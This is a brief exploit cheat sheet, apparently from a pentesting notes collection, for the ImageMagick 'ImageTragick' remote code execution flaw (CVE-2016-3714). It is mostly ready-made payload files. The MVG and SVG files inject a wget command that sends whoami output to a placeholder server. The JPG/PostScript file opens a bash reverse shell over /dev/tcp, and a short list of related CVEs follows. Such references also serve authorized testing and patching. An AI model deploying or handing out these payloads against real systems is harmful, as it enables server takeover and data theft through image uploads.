ImageMagick (CVE-2016-3714)

There is a vulnerability in ImageMagick, that can lead to RCE. THe vulnerability description and exploitation are described on the official website ImageTragick.

Common exploits

exploit.mvg

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/x.jpg"|wget http://<server_ip>/$(whoami)'
pop graphic-context

exploit.svg

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd";>
<svg width="640px" height="480px" version="1.1" xmlns="http://www.w3.org/2000/svg"; xmlns:xlink="http://www.w3.org/1999/xlink";>
    <image xlink:href="https://127.0.0.1/x.jpg&quot;|wget http://<server_ip>/$(whoami)" x="0" y="0" height="640px" width="480px"/>
</svg>

exploit.jpg

%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/<host>/8080 0>&1') currentdevice putdeviceprops

Others vulnerabilities

There is others known vulnerabilities:

CVE-2016-3718 - SSRF
CVE-2016-3715 - File deletion
CVE-2016-3716 - File moving
CVE-2016-3717 - Local file read